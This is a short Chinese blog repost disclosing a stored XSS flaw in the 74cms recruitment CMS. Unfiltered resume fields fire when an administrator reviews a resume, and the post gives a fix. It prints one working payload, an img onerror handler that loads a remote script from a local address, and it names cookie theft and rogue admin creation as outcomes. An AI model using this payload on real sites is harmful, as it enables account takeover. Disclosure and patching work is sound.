记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

74cms人才系统存储型XSS及修复

2014-06-15 19:20
74CMS对用户输入没有进行有效过滤,导致XSS漏洞存在。漏洞触发时,可拿到系统管理员COOKIE信息,修改后台设置,增加管理员等。
 
1、74CMS人才系统对创建简历的各字段没有进行有效过滤,导致存储型XSS漏洞的存在,存在漏洞的字段包括户口所在地、技能特长、工作经历等等。
 
当系统管理员登陆后台,审核用户提交简历时,漏洞便会触发。利用此漏洞可以盗取管理员的cookie信息登陆后台、或者使用恶意脚本修改后台设置,例如:删除用户提交简历,增加新的管理员等等。
 
 
 
2、从官网:http://www.74cms.com/ 下载最新版源代码,在本地搭建环境进行测试。
 1、注册普通用户,在会员中心模块创建新简历,并在技能技能特长部分输入以下内容:
 
 
2、简历创建完毕,系统管理员登陆后台,查看简历进行审核:
 
3、打开简历,漏洞触发:
 
4、使用Firebug查看源代码:
 
5、修改插入的恶意标签为:
 
<img src=x onerror=d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e);>
 
6、管理员审核简历,漏洞触发:
 
 
 
成功加载本地脚本,通过修改脚本代码,我们可以对系统后台进行恶意修改,例如:删除简历,增加管理员等等。
修复方案:
对用户创建简历的各个字段进行有效过滤,禁止特殊字符和特殊属性的输入
知识来源: www.2cto.com/Article/201406/309105.html

阅读:235367 | 评论:0 | 标签:xss cms

想收藏或者和大家分享这篇好文章→复制链接地址

“74cms人才系统存储型XSS及修复”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词